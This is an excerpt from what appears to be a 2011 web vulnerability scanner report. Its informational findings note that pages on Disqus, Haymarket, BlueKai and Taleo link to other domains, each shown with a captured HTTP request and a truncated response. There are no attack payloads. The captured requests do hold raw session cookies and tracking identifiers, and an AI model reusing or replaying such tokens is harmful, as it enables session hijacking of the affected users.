X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<link rel="stylesheet" type="text/css" media="all" href="http://cdn-cms.scout.com/css/layout-min.css" />
       <link rel="stylesheet" type="text/css" href="http://images.video.msn.com/js/ch/channels.css" />

       
                   <script type="text/javascript" src="http://cdn-cms.scout.com/js/ui-min.js">
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.msn.com/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left"> <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a> <a href="http://g.msn.com/0TO_/enus">Legal</a> <a href="http://advertising.msn.com/msn/">Advertise on MSN</a> <a href="http://g.msn.com/AIPRIV/en-us">About our ads</a> <a href="http://rss.msn.com/">RSS</a>
...[SNIP]...
24.42. http://scmagazineus.disqus.com/combination_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scmagazineus.disqus.com
Path:   /combination_widget.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200 HTTP/1.1
Host: scmagazineus.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:49:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 14381


function dsqComboTab(tab) {
   document.getElementById('dsq-combo-people').style.display = "none";
   document.getElementById('dsq-combo-popular').style.display = "none";
   document.getElementById('dsq-
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/new-york-yankees-expose-season-ticket-holders-data/article/201633/">New York Yankees expose season ticket holders&#39; data - SC Magazine US</a>&nbsp;&middot;&nbsp;<a href="http://www.scmagazineus.com/new-york-yankees-expose-season-ticket-holders-data/article/201633/#comment-198648142">1 hour ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/is-malware-on-the-decline-or-is-evasion-on-the-rise/article/201456/">Is malware on the decline, or is evasion on the rise? - SC Magazine US</a>&nbsp;&middot;&nbsp;<a href="http://www.scmagazineus.com/is-malware-on-the-decline-or-is-evasion-on-the-rise/article/201456/#comment-198502783">3 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/personal-data-of-x-factor-hopefuls-exposed/article/202117/">Personal data of &quot;X-Factor&quot; hopefuls exposed - SC Magazine US</a>&nbsp;&middot;&nbsp;<a href="http://www.scmagazineus.com/personal-data-of-x-factor-hopefuls-exposed/article/202117/#comment-198414497">5 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/anonymous-spokesman-on-sony-hack-it-wasnt-us/article/202134/">Anonymous spokesman on Sony hack: &quot;It wasn&#39;t us&quot; - SC Magazine US</a>&nbsp;&middot;&nbsp;<a href="http://www.scmagazineus.com/anonymous-spokesman-on-sony-hack-it-wasnt-us/article/202134/#comment-198373329">6 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/you-dont-have-to-hack-to-be-tried-as-a-hacker/article/201936/">You don&#39;t have to hack to be tried as a hacker - SC Magazine US</a>&nbsp;&middot;&nbsp;<a href="http://www.scmagazineus.com/you-dont-have-to-hack-to-be-tried-as-a-hacker/article/201936/#comment-198364805">6 hours ago</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/new-york-yankees-expose-season-ticket-holders-data/article/201633/">New York Yankees expose season ticket holders&#39; data - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/is-malware-on-the-decline-or-is-evasion-on-the-rise/article/201456/">Is malware on the decline, or is evasion on the rise? - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/personal-data-of-x-factor-hopefuls-exposed/article/202117/">Personal data of &quot;X-Factor&quot; hopefuls exposed - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/you-dont-have-to-hack-to-be-tried-as-a-hacker/article/201936/">You don&#39;t have to hack to be tried as a hacker - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/anonymous-spokesman-on-sony-hack-it-wasnt-us/article/202134/">Anonymous spokesman on Sony hack: &quot;It wasn&#39;t us&quot; - SC Magazine US</a>
...[SNIP]...
24.43. https://subscribe.haymarketmedia.com/scm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /scm/?form=paid HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lvsr30zwf1fkw5aao1zymfq2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:50:11 GMT
Content-Length: 114361


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
<div id="ctl00_MainContentPlaceHolder_TrustedSecure" style="float:right; margin-top:60px; margin-right:30px;">
<script language="JavaScript" src="https://www.csctrustedsecure.com/trustlogo/javascript/trustlogo.js" type="text/javascript"></script>
...[SNIP]...
24.44. http://tags.bluekai.com/site/2576  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2576

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /site/2576?ret=html&phint=u=9b6b0&phint=ord= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=naush555;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc47740; bko=KJ0qh1q9TaOIhJKqTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYg7CZB; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YROQ9B3Nuw; bkst=KJh5Ae2n9pWRCp1DOcrNQbBxcaywXF5B9QfVKkSaDrooHbD8zArCcKg5iEMbYR3Er0iir9Qbia/HjhzdQTmnZbr8z0kZYgdlI4WIuxA2piJlpibKViU6fmTpvO76OXBLLJv2rZMiGiDDWDLRJ+j7wHnfwmoJU0rJdHQRsOWEq9WSO4d0hpBnOUegutV1pt1g4/1JIBGS3bpYce9q42TTd7NboSMZa+XrZA51RQOBsjKYYYS9Yql7wqCh+EpPVYTSgUnHTWxg0Gav0QP/xAs+ammEbzqOXzHao08SHngEmRhttinjGJL2r5g7SEmAGRRAqM5cTPgMolq7tcwcn3OswxiePgKeQ0EqegqAvBAcD62c643yUlCPFayiUXTDRv/okzgJWeUIr7qMVQDCetP+SfnbW52BrbklZz+2Pc/EYuY1T9/Eb7TERbwMi/90lmQGCAidl5Xb2Zgrl2Bd9zQjzNG=; bk=VlL0EFJCToZVIHOf; bkc=KJh56XLghaWDOdeFcz1RMtRVoB9GhoYAY/VBhXgi+h6Va+JLfmDPB5/AP+HWvVrwvHSpLV90Xi5RveP8oYyDstnamj4g2p+lIS7pF44zlpZdzOAy+QD1pk68H49CE/8qe3uAmbrAJd0rXIE0utYWg9e+Ivy6Nh+p4FpFw7S09GQ6v9hd8JNiesQ7kic1KKBnYolD9QfjC0g+RX+zqfh5OYpt9pBnKU64IbNwIL70P3d6oZDIldiqIC+Bv2hAnF85w0A2NYa5t0J2comIMkg85xMpdzRq84uKQWnbwD4p3BjI+zpNh3POGWepEVH0mL2KZjPmVrSXzPz/KnhEiOI8Fg412zRjZ7ztYfxKrO8/uUm2zSuu23BjGznMkhiWr5fTMwJItgd5455gM5JzqphBdU6IvFuWzGT4uMFt/BNArRlt6VF4Q7EjFwEpkcH5MEElRIpx4nfXYGmCldfRUK6xNFdq7Tw6doNrCKpCbqXnDV7KabX8qNhYw+8E0ciXje75fEo/lI2iOXvJPKZConuK3IKXtbQX7dFpZFLpdQcdSwsF; bkdc=res

Response

HTTP/1.0 200 OK
Date: Sat, 07 May 2011 11:24:42 GMT
Set-Cookie: bklc=4dc52bfa; expires=Mon, 09-May-2011 11:24:42 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=uXtktHA+ZqtVIHOf; expires=Thu, 03-Nov-2011 11:24:42 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeFBKwceJojAWvMsWmu/CupXVBkXqqeyAvSMqlsM6SBJnsiJAojIpWNagmhRen0JNQGJE2uaGGBLKvzjIbX5If0DI5fff7F7O46981fy1MY+KVahh1AhyhUgAFlNAkwKh6U0BPUyeCj9VecW+JzgXl83KJ2faxBWsoHswL3VmV/tGbFxJMptkzDmZ6Wnc/jbZh7eUm223TcVOTs8o1aIpfth8e6iIs5xKk+yl0I2idNB8aVr1Nzk+yX/plS/2lR/U6HAqTJsdkBYww2tkFP2J8vC4H7lFvQlFSfRSfUgF/O2pE4KYjF82ZgYKZDRz8g2yV98yKat/7MHXBzg8tCKK50xmKHTIibBB5gCtoow2GPSkhIi6YRbfUwvKIkd5Ld5npHvLlNt7wDldKpyA9QEdrgqWKKoBL152WIrkttJmN4kcb5kV83AmjI+YtSpT2URuEylhIfghFY2F2V+/dKF2KFAeLIvdAIn1lfTMq7+uF/txmaM1+JyIkIhpfb4o5fW/bFuRIZomt8rLbfYXFprEIlrEd+wtbDXzQ=; expires=Thu, 03-Nov-2011 11:24:42 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; expires=Thu, 03-Nov-2011 11:24:42 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2n9pWRCp1DOcrNQb1QeZ80An2FW7OGgV5PvvVK5kuS/fzDt3cz7EMfYR3Er0iir9QbivvGLTr4yzcaEU9050faEmclwMdKJ0ZCrt7ApFco4SrWc+h2YiVedZYReVgjLTLKUqu//Z/JyXEbgW5i76z2bVLkLHXe90BiQiN9GIY4d7CZ3xOr4SZ1XUkLCVXy9P2qR8PPZ9BZTT2nhf2BgCEPlmnnHqm/ux0QvKBuW1WW1valFPLlgoR7sL+aGNDrsohGHEkxuqA9uuiGVMWI7spXnntTb1CaY6ClmFFH5kLAbluMJN4bwstsBBuxhmlZvah+4124mdqWLUmGDxdYGBU+TYeJ+GJBmDgtyBEEDqxtfO5KauIU0JzpOjCGu3P01AuBw0dzKnbYA/K0+MPjdReFoBlDmXFklir8ixxxH7YOYUVdiqcHzDH9sV86aWmAUtIrccLIXIdoFdRcz81=; expires=Thu, 03-Nov-2011 11:24:42 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; expires=Thu, 03-Nov-2011 11:24:42 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 08-May-2011 11:24:42 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 249
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://sync.mathtag.com/sync/img?mt_exid=10002&redir=http://tags.bluekai.com/site/2948?phint=idswap_partner=bk&id=PARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...
24.45. http://tags.bluekai.com/site/2576  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2576

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0E8VBQrncbQvXuQ0uDJzQxJLM9R1mdp8KHRH/q96BJpDa4EQRqGJQoV10qaXJiRAiWLoQj3GObE0fj9jxNjZ5Qt95ZlKsabsPiD/Vp9/hpszW=; bkst=KJh5Mp2ny69RhZXGYeSNQbBxcaye2dK2mlYyNkQPuG7HMGGUnArQcVGuWz5IQrnAnGGGnG/m/rMQfmJ7zcOhzdVu34CmhdwX7F52gGSK88sqibrUUQt2r4zvioZk9gMNoEns8TAPFLWW4stBPPjCeoCBFITzdIcTmjxB6IsGs/oZrKncuRr/ux0QvKBuW1WW1vWwFY57BILpi5D36S+UYDb6GC0Goa09JOEDVZPwjCwcjb2mm74u1+JCKOnF2DVtHqKw8cgvXt8W/yNj6rImGTlmqIFOLjKmUDv55C9aFDs/QbpReUqAmeLW6XfcXKRGgUGNFnJWKjyoyWHEvoDgx2E6I2qjgxjYcigbNCE+Dfb4elnFripltuiqu9OCOOKR6/HQM/NmRQnvzvwMOsn2d7MFtJra4Ndd9NrqRq1=; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnh19EJPemz9avYen5BWEnqQsylpA3sYIyQ1E+nWJ7Jn0lmyvO3yzeQha7BG1qWy1eYAmXaAo7sd9sGQLzvS9yehexKWO1GX82cJGsHxHBJCQLr/bUm0v9BkiAO0pOYjEC8o8Ly1rQM0EYC0OuYj/9rI1//YGByKTxnFsyH27YMtcwqeZWS1TooqZe2NP9hjelrRJAuaOAtlo38M9p+eQy1SHnPeYkQLHzmWOzXOqG9PKRkAG0OW0xVxYfQjsOpHGHNee9VsUQgsPTyQl0blQ6uNA0Pe9hfAVuRsHRM0Uppxeq+794YB9YWAATJ; bk=bhbvxbkYUciVIHOf; bkc=KJh56gNnxkWROFe7bmNe1N0vy1vQpYvixuyGkthgrsL6BWuT+W5DsBy/AjGvJYaGfrmYeuTBJKg46O9WDA7xWBHuNaE7FUsX2plMMdrX8pf7yyGO6DsOISIStRRDnm71eoiUe55N9Pha9awSChfcJztDPpft92rpyc3tjLowMM2ZraX6c6Npct3Z2jPdjqIaQLY2UVN8R/DfwzA5sKVIMUw4hqE84EeEd8DwrrHImQxv7hUEMNfcf8Gog2yj9OG8KzjthjA7ft8yV8ooUMAHOo3w9GrUgoX6DNfjeQnk1MOtfM3PTbSXzgxqVOGHYc7XaQzp8jPF8nhHO6fmUmKcrYZFFYqf4EzaoL/P6TOyccdZc+RXn+IMNfT+fr9Z2IL35lX4BdPHBrU2dOQYzIcd4rEWOJQogh0xI0XZOzGUN06lR+p6Ug0ZKKPtb5voQmNhP71CbEGQpb2SOcBZMp++zEFlbk7F/zqUol8KDpdkw6Ixtv/=

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:36 GMT
Set-Cookie: bklc=4dc47740; expires=Sun, 08-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=hClmGTTKarbVIHOf; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9TaOIhJKnTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYgmOZ1; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYsa5ESAT0tyEu/3Tr0vVwAsyLC5aaO+OYNWDLqqhsuhLfs05luoT3X+lpgkpoG/Kj8sqLTr7qQD2rl6sozwOzJxwZdZqxbXmnSsRVu39VNX3Rl0KVmWqE1eUNkCkaKS9tKEghFAdoAI/K7cNhba8hYxs6JHhvRCQ9oMxr2beAIFP3zH0ZKCV0yx7VkWmPa/rxO/v3k7vJ2mJQI1UC6T5VAxbe9dMfj8/NI7sFkyjXvyE6DCeZFxbTtiNd5rTz28p8NN9fPRxO5NIi/16lyGt8EM592wvhFcSSaet37kaiKJhoQ9EESkDgQhHAI2gJp53YcAGfNZE+TfTE+qwF1rilsK+SY/OCOazRW/EQMWtmGAJv1mBMCm/24F2g4BKp4lfICdG+t54; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhM6tJQRmY3jK9YDA/1MdxjsOQjmnAmEs5QI9KV3VETOSHRsHnzWeJq5YW0/eNzeBK1Wev7AsuTs4Ti0UQRQZu3sDT9vDsstbR/ZVN9+C+7Jz1a5oYR7uV/pmuUaZ5QDnPQRceigsjxRtJQRsc/2ynJEswI9aEORyD6CQaisQI/YjE8p0mEy1iQiuEeOjKHDZ5A69qnk/OksvW07npEEHQj2JaAZaOAYAW0xO5XRxuaxqQ2yQPK+QCfracLrVtc1/6jhExlLw833Oi0c7KyE9ZveO+FpPhsC7RcOGR6iV3saneRYyK/Y8TYUR93XhJJhL9JWQLQal90LeAMyMGss/L1FJD1n8COwklFOQkgoAGsCgN/1Ly1i8aAF7AQZlqm9tWS9njCDPQ=; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 239
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_bk&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2751%3Fid%3d%7euk%7e" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...
24.46. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tbe.taleo.net
Path:   /NA9/ats/careers/jobSearch.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /NA9/ats/careers/jobSearch.jsp?org=BT&cws=1&__utma=1.2052460901.1304724283.1304724283.1304724283.1&__utmb=1.1.10.1304724283&__utmc=1&__utmx=-&__utmz=1.1304724283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=178642980 HTTP/1.1
Host: tbe.taleo.net
Proxy-Connection: keep-alive
Referer: http://www.btamericascareers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=69BC8F52CA8219FC1D3E62420D8128B6.NA9_primary_jvm; Path=/NA9/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Content-Length: 27234


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHT
...[SNIP]...
<HEAD>

<BASE href="http://www.btamericascareers.com" id="whlb_baseElement"></BASE>
...[SNIP]...
<DIV id="btlogo">
<A href="http://www.btplc.com/index.cfm"><IMG width="87" height="42" alt="BT Logo" src="/furniture/bt_logo_static.jpg">
...[SNIP]...
<LI><A title="Browse Jobs" target="_blank" onclick="pageTracker._link(this.href); return false;" href="http://jobs.btamericascareers.com" target=..._blank...>Browse Jobs</A>
...[SNIP]...
<li>
<a href="http://twitter.com/bt_careers" target="_blank" alt="BT Americas Careers on Twitter"
ONMOUSEOVER='twitterswap.src="http://de.nlx.org/buttons/social/twitter_hover.gif"'
ONMOUSEOUT='twitterswap.src="http://de.nlx.org/buttons/social/twitter.gif"'><img src="http://de.nlx.org/buttons/social/twitter.gif" NAME="twitterswap"/></a>
</li>

<li>
<a href="http://www.youtube.com/user/BTCareers" target="_blank" alt="BT Careers on You Tube"
ONMOUSEOVER='youtubeswap.src="http://de.nlx.org/buttons/social/youtube_hover.gif"'
ONMOUSEOUT='youtubeswap.src="http://de.nlx.org/buttons/social/youtube.gif"'><img src="http://de.nlx.org/buttons/social/youtube.gif" NAME="youtubeswap"/></a>
</li>

<li>
<a href="http://www.facebook.com/pages/BT-Careers/123009137753569" target=_blank" alt="BT Americas Careers on Facebook"
ONMOUSEOVER='fbswap.src="http://de.nlx.org/buttons/social/facebook_hover.gif"'
ONMOUSEOUT='fbswap.src="http://de.nlx.org/buttons/social/facebook.gif"'><img src="http://de.nlx.org/buttons/social/facebook.gif" NAME="fbswap"/></a>
</li>

<li>
<a href="http://www.linkedin.com/companies/bt" target="_blank" alt="BT Careers on LinkedIn"
ONMOUSEOVER='linkedinswap.src="http://de.nlx.org/buttons/social/linkedin_hover.gif"'
ONMOUSEOUT='linkedinswap.src="http://de.nlx.org/buttons/social/linkedin.gif"'><img src="http://de.nlx.org/buttons/social/linkedin.gif" NAME="linkedinswap"/></a>
</li>

<li>
<a href="http://www.directemployers.org/become-a-follower/" target="_blank" alt="DirectEmployers E-News"
ONMOUSEOVER='enewsswap.src="http://de.nlx.org/buttons/social/enews_hover.gif"'
ONMOUSEOUT='enewsswap.src="http://de.nlx.org/buttons/social/enews.gif"'><img src="http://de.nlx.org/buttons/social/enews.gif" NAME="enewsswap"/></a>
...[SNIP]...
</style><script src="https://www.linkedin.com/secure/companyInsider?script=&useBorder=yes" language="javascript"></script>
...[SNIP]...
<p>

<a href="http://twitter.com/bt_careers" target="_blank" alt="BT Americas Careers on Twitter"
ONMOUSEOVER='twitterswap.src="http://de.nlx.org/buttons/social/twitter_hover.gif"'
ONMOUSEOUT='twitterswap.src="http://de.nlx.org/buttons/social/twitter.gif"'><img src="http://de.nlx.org/buttons/social/twitter.gif" NAME="twitterswap"/></a></li>

<a href="http://www.youtube.com/user/BTCareers" target="_blank" alt="BT Careers on You Tube"
ONMOUSEOVER='youtubeswap.src="http://de.nlx.org/buttons/social/youtube_hover.gif"'
